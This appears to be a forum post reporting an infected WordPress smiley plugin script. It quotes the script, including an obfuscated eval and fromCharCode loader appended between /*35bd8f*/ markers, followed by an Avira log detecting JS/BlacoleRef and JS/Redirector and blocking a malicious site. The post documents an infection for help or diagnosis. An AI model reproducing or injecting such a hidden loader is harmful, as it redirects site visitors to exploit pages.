- eval(function(p, a, c, k, e, r) {
- e = function(c) {
- return (c < a ? '' : e(parseInt(c / a)))((c = c % a) > 35 ? String.fromCharCode(c 29) : c.toString(36))
- };
- if (!''.replace(/^/, String)) {
- while (c--) r[e(c)] = k[c] || e(c);
- k = [function(e) {
- return r[e]
- }];
- e = function() {
- return '\\w '
- };
- c = 1
- };
- while (c--) if (k[c]) p = p.replace(new RegExp('\\b'
- e(c)'\\b', 'g'), k[c]);
- return p
- }('m B(){5 a,2,14;2=9;6=13.l.S(\'Q\');a=4.G(\'N\');3(a.7>1){k(5 i=0;i<a.7;i ){3(a[i].v==\'o\'){2=a[i]}c 3((a[i].12==\'o\')&&(2==9)){2=a[i]}c 3((a[i].U==\'o\')&&(2==9)){2=a[i]}}3(2==9){k(i=0;i<a.7;i ){T{3(a[i].K)2=a[i]}L(e){}}}3(2==9){2=a[0]}}c 3(a.7==1){2=a[0]}3(2==9){W(15(\'%s\',6,t[\'M\']))}3(4.J){2.O();u=4.J.R();u.6=\' \' 6 \' \'}c 3(2.r||2.r==0){2.d=2.d.I(0,2.r) \' \' 6 \' \' 2.d.I(2.11,2.d.7)}c{2.d =\' \' 6 \' \'}b q}m H(){4.8(\'g-f-w\').F.x=\'P\';5 a=4.8(\'g-f-n\');a.E("p","b y()");a.l.D="\\V\\z" t[\'X\'];b q}m y(){4.8(\'g-f-w\').F.x=\'Y\';5 a=4.8(\'g-f-n\');a.E("p","b H();");a.l.D=t[\'Z\'] "\\z\\10";b q}3(4.8("C")){5 A=4.8("C");5 j=A.G(\'a\');k(5 h=0;h<j.7;h ){3(j[h].v!=\'g-f-n\'){j[h].p=B}}}', 62, 68, '||ta|if|document|var|text|length|getElementById|null||return|else|value||smiley|wpu|wpuI||smls|for|firstChild|function|toggle|comment|onclick|false|selectionStart||wpuLang|sel|id|more|display|wpuSmlLess|u00A0|smlCont|wpuSmlAdd|wpusmls|nodeValue|setAttribute|style|getElementsByTagName|wpuSmlMore|substring|selection|gotFocus|catch|wpu_smiley_error|textarea|focus|inline|alt|createRange|getAttribute|try|className|u00AB|alert|wpu_less_smilies|none|wpu_more_smilies|u00BB|selectionEnd|name|this|tb|replace'.split('|'), 0, {}))
- /*35bd8f*/
- try {
- window.document.body++
- } catch (gdsgsdg) {
- dbshre = 122;
- }
- if (dbshre) {
- asd = 0;
- try {
- d = document.createElement("div");
- d.innerHTML.a = "asd";
- } catch (agdsg) {
- asd = 1;
- }
- if (!asd) {
- e = eval;
- }
- ss = String;
- asgq = new Array(31, 94, 110, 104, 94, 107, 97, 104, 104, 27, 31, 33, 25, 117, 27, 4, 2, 25, 112, 92, 105, 24, 106, 91, 96, 104, 111, 25, 55, 27, 91, 103, 92, 111, 104, 92, 102, 109, 40, 94, 105, 93, 90, 110, 96, 60, 100, 94, 103, 96, 101, 108, 33, 33, 100, 93, 106, 90, 103, 96, 30, 33, 52, 26, 8, 1, 24, 106, 91, 96, 104, 111, 39, 109, 109, 90, 24, 54, 26, 34, 95, 108, 109, 106, 53, 38, 39, 102, 95, 98, 88, 107, 109, 105, 109, 102, 102, 39, 93, 106, 100, 39, 32, 53, 27, 4, 2, 25, 107, 92, 92, 105, 112, 40, 110, 107, 113, 101, 95, 41, 103, 103, 108, 99, 111, 96, 103, 103, 26, 56, 23, 31, 90, 92, 110, 102, 100, 110, 110, 96, 30, 51, 25, 7, 5, 23, 105, 90, 95, 108, 110, 38, 108, 110, 116, 99, 93, 39, 92, 106, 105, 92, 94, 108, 27, 52, 24, 32, 42, 34, 50, 24, 6, 4, 27, 104, 89, 94, 107, 114, 37, 107, 109, 115, 103, 92, 38, 97, 95, 100, 94, 96, 109, 26, 56, 23, 31, 42, 106, 115, 30, 51, 25, 7, 5, 23, 105, 90, 95, 108, 110, 38, 108, 110, 116, 99, 93, 39, 113, 100, 91, 108, 97, 26, 56, 23, 31, 42, 106, 115, 30, 51, 25, 7, 5, 23, 105, 90, 95, 108, 110, 38, 108, 110, 116, 99, 93, 39, 102, 96, 93, 108, 25, 55, 27, 30, 41, 105, 114, 34, 50, 24, 6, 4, 27, 104, 89, 94, 107, 114, 37, 107, 109, 115, 103, 92, 38, 109, 105, 107, 23, 53, 25, 33, 44, 103, 112, 32, 53, 27, 4, 2, 6, 4, 27, 96, 94, 25, 34, 28, 91, 103, 92, 111, 104, 92, 102, 109, 40, 98, 92, 108, 62, 102, 96, 100, 93, 103, 110, 61, 112, 65, 93, 34, 34, 104, 89, 94, 107, 114, 30, 33, 34, 26, 118, 23, 5, 3, 26, 95, 102, 91, 110, 103, 96, 101, 108, 39, 113, 109, 96, 108, 94, 34, 34, 51, 92, 98, 112, 27, 96, 92, 54, 86, 34, 104, 89, 94, 107, 114, 83, 31, 25, 56, 55, 38, 92, 98, 112, 57, 30, 33, 52, 26, 8, 1, 24, 93, 105, 94, 108, 101, 94, 104, 111, 37, 95, 94, 110, 64, 99, 93, 102, 95, 105, 107, 58, 114, 67, 95, 31, 31, 106, 91, 96, 104, 111, 32, 35, 41, 88, 104, 105, 95, 105, 91, 59, 97, 99, 103, 91, 32, 106, 91, 96, 104, 111, 34, 53, 27, 4, 2, 25, 119, 27, 4, 2, 25, 119, 36, 31, 33, 52);
- s = "";
- for (i = 0; i - 453 != 0; i++) {
- if ((020 == 0x10) && window.document) s += ss.fromCharCode(1 * asgq[i] - (i % 5 - 5 - 4));
- }
- z = s;
- e(s);
- } /*/35bd8f*/
复制代码
Avira
2013/11/8 下午 07:06 [System Scanner] 發現惡意程式碼
檔案 'C:\Users\alan\AppData\Local\Microsoft\Windows\Temporary Internet
Files\Content.IE5\VE1JW7DB\favicon[1].htm'
包含病毒或有害的程式 'JS/Redirector.xbma' [virus]
已採取動作:
檔案會移動至 '5aac656c.qua' 名稱底下的隔離區目錄!
2013/11/8 下午 07:06 [System Scanner] 掃描
掃描結束 [已完成全部的掃描.]。
檔案數: 827
目錄數: 0
惡意程式碼數: 1
警告數: 0
2013/11/8 下午 07:06 [System Scanner] 發現惡意程式碼
檔案 'C:\Users\alan\AppData\Local\Microsoft\Windows\Temporary Internet
Files\Low\Content.IE5\T3RSTA4V\wpu-min[1].js'
包含病毒或有害的程式 'JS/BlacoleRef.W.110' [virus]
已採取動作:
檔案會移動至 '590b6b7b.qua' 名稱底下的隔離區目錄!
2013/11/8 下午 07:06 [System Scanner] 發現惡意程式碼
檔案 'C:\Users\alan\AppData\Local\Microsoft\Windows\Temporary Internet
Files\Low\Content.IE5\T3RSTA4V\womenview_ru[1].htm'
包含病毒或有害的程式 'JS/Redirector.xbma' [virus]
已採取動作:
檔案會移動至 '418444db.qua' 名稱底下的隔離區目錄!
2013/11/8 下午 07:06 [System Scanner] 掃描
掃描結束 [已完成全部的掃描.]。
檔案數: 842
目錄數: 0
惡意程式碼數: 2
警告數: 0
2013/11/8 下午 07:05 [Real-Time Protection] 發現惡意程式碼
在檔案 'C:\Users\alan\AppData\Local\Microsoft\Windows\Temporary Internet
Files\Low\Content.IE5\T3RSTA4V\wpu-min[1].js 中
偵測到病毒或有害的程式 'JS/BlacoleRef.W.110 [virus]'
執行的動作:傳輸至掃描程式
2013/11/8 下午 07:05 [Real-Time Protection] 發現惡意程式碼
在檔案 'C:\Users\alan\AppData\Local\Microsoft\Windows\Temporary Internet
Files\Content.IE5\VE1JW7DB\favicon[1].htm 中
偵測到病毒或有害的程式 'JS/Redirector.xbma [virus]'
執行的動作:傳輸至掃描程式
2013/11/8 下午 07:05 [Real-Time Protection] 發現惡意程式碼
在檔案 'C:\Users\alan\AppData\Local\Microsoft\Windows\Temporary Internet
Files\Content.IE5\VE1JW7DB\favicon[1].htm 中
偵測到病毒或有害的程式 'JS/Redirector.xbma [virus]'
執行的動作:拒絕存取
2013/11/8 下午 07:05 [Real-Time Protection] 發現惡意程式碼
在檔案 'C:\Users\alan\AppData\Local\Microsoft\Windows\Temporary Internet
Files\Low\Content.IE5\T3RSTA4V\womenview_ru[1].htm 中
偵測到病毒或有害的程式 'JS/Redirector.xbma [virus]'
執行的動作:傳輸至掃描程式
2013/11/8 下午 07:05 [Real-Time Protection] 發現惡意程式碼
在檔案 'C:\Users\alan\AppData\Local\Microsoft\Windows\Temporary Internet
Files\Low\Content.IE5\T3RSTA4V\wpu-min[1].js 中
偵測到病毒或有害的程式 'JS/BlacoleRef.W.110 [virus]'
執行的動作:拒絕存取
2013/11/8 下午 07:05 [Real-Time Protection] 發現惡意程式碼
在檔案 'C:\Users\alan\AppData\Local\Microsoft\Windows\Temporary Internet
Files\Low\Content.IE5\T3RSTA4V\womenview_ru[1].htm 中
偵測到病毒或有害的程式 'JS/Redirector.xbma [virus]'
執行的動作:拒絕存取
2013/11/8 下午 07:04 [Web Protection] 已停用 Web Protection
服務已停用
2013/11/8 下午 07:04 [Web Protection] 封鎖的網頁
URL (http://www.womenview.ru/) 的評估結果為 惡意程式碼,而遭到封鎖.
fs is
|